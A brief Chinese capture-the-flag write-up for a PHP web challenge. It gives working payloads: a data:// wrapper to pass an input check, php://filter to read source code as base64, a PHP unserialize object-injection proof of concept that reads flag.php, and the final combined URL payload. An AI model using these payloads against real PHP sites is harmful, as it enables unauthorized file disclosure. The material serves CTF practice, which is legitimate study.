1、源码,需要构造满足条件的三个参数
2、text利用data伪协议绕过
text=data://text/plain,welcome to the zjctf
3、file利用php进行文件包含
file=php://filter/read=convert.base64-encode/resource=useless.php
解码得:
<?php
class Flag{ //flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?>
4、password构造反序列化POC;
<?php class Flag { //flag.php public $file = 'flag.php'; } $a = new Flag(); echo urlencode(serialize($a)); ?>
得序列化序号:
O%3A4%3A%22Flag%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3B%7D
5、构造的反序列化会把之前的覆盖掉,不需要再去伪协议访问useless.php最终payload:
?text=data://text/plain,welcome%20to%20the%20zjctf&file=useless.php&password=O%3A4%3A"Flag"%3A1%3A%7Bs%3A4%3A"file"%3Bs%3A8%3A"flag.php"%3B%7D
查看源码: